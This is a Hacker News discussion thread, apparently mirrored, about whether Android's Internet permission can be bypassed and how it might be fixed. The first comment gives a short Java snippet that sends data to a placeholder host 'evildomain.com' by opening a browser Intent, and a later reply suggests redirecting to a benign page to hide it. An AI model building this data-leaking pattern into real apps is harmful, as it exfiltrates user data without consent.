zlacker

[parent] [thread] 10 comments
1. UncleM+(OP)[view] [source] 2025-08-25 22:23:12
> I've heard claims that the Internet permission is flawed, yes, but I've never managed to find even a single PoC bypassing it.

   Uri uri = Uri.parse("https://evildomain.com/upload?data=DATA_GOES_HERE);
   Intent i = new Intent(Intent.ACTION_VIEW, uri);
   startActivity(i);
Happily uses the browser app to do the data send for you. Requiring apps to have all the permissions of the recipient of an Intent before being allowed to send it would be a catastrophic change to the ecosystem.
replies(3): >>broker+s6 >>sterli+2D >>noname+b61
2. broker+s6[view] [source] 2025-08-25 23:06:17
>>UncleM+(OP)
> would be a catastrophic change to the ecosystem.

Hey we were already on board with this, you don't have to convince us.

replies(1): >>UncleM+Od
◧◩
3. UncleM+Od[view] [source] [discussion] 2025-08-26 00:06:26
>>broker+s6
The effect of this would be to make all apps request all permissions because even if you are just using some other app for a particular feature you need, you have no control over what other permissions they might add which would suddenly break any intents you send them. The only defense would be to request everything.

You could very specifically ban ACTION_VIEW intents for web URIs from apps without an internet permission I guess. But does banning apps from linking to the web (to be opened in browsers) really seem like a good idea?

replies(1): >>ycombi+oi
◧◩◪
4. ycombi+oi[view] [source] [discussion] 2025-08-26 00:52:10
>>UncleM+Od
Similar changes have been done before, the security sandbox behaves differently based on the app's minimum/target API level for backwards compatibility.

That's also why there's a warning before installing really old apps, they may run with extra permissions.

5. sterli+2D[view] [source] 2025-08-26 04:26:45
>>UncleM+(OP)
so? pop up a permission prompt. have the user confirm.

and isn't it immediately apparent that the app is leaking data if your calculator is popping a webview?

replies(1): >>UncleM+wL
◧◩
6. UncleM+wL[view] [source] [discussion] 2025-08-26 06:03:19
>>sterli+2D
"Pop up a permission prompt every single time an app links out to a browser" is not going to be a thing that users like.

Yes, this is a little suspicious. But you just have the evil page redirect to google.com or something benign. To the user it looks like "huh, chrome just opened on its own."

replies(1): >>jech+M81
7. noname+b61[view] [source] 2025-08-26 09:01:54
>>UncleM+(OP)
I don’t see why you couldn’t disallow opening URL intents. App intents that enable to exfiltrate data should be cracked down on by Google, it’s basically a privilege escalation.
replies(1): >>UncleM+Rj1
◧◩◪
8. jech+M81[view] [source] [discussion] 2025-08-26 09:31:32
>>UncleM+wL
> "Pop up a permission prompt every single time an app links out to a browser" is not going to be a thing that users like.

Calculator.apk wants to open the web page https://eviltracker.example.com. Allow this time? Allow for 24 hours? Allow and don't ask me again?

replies(1): >>UncleM+ik1
◧◩
9. UncleM+Rj1[view] [source] [discussion] 2025-08-26 11:06:11
>>noname+b61
"No links to web uris allowed" would be a pretty intense restriction. Now the free calculator can't even link to the paid version on the app store. There's already precious few apps that don't really need internet access (usually simple tools apps that don't have ads) and this even further limits that set.
◧◩◪◨
10. UncleM+ik1[view] [source] [discussion] 2025-08-26 11:09:19
>>jech+M81
Do we show this annoying popup (that the large majority of the time will be benign and just aggravate users) for all apps, or just those that don't request the internet permission?

Doing this for all apps would be wild. Doing this just for those that don't request the internet permission just encourages more apps to request it (it is basically universally used anyway). "Huh, why does my calculator need internet" has never actually been effective at helping people avoid malware at any meaningful scale.

replies(1): >>const_+Pb2
◧◩◪◨⬒
11. const_+Pb2[view] [source] [discussion] 2025-08-26 15:54:42
>>UncleM+ik1
> Doing this for all apps would be wild.

No it wouldn't, not at all.

90% of apps on your phone do not need to be apps. Facebook does not need to be an app. Instagram does not need to be an app.

This is a sober reminder that apps are executables code that is running on your phone with very little sandbox. Its not like a web browser.

We do not need to execute compiled binaries that are closed source to buy parking that one time. No, no we don't.

Why do we? Because as I've said - such apps are much more powerful than the web browser and can therefore be used as spyware or keyloggers. Most apps on Android, including most Google apps, can be regarded as spyware.

Companies don't want to give up their de facto malware they've built up, and now users are trained to just install whatever the fuck on their phone.

We have given software 1000x more permission than it needs to do want it does. And now, we sit back and complain about malware.

This starts with Google, this starts with Meta, this starts with big tech. They directly caused all this malware by forcing users into downloading executables so they can exfiltrate your key presses.

[go to top]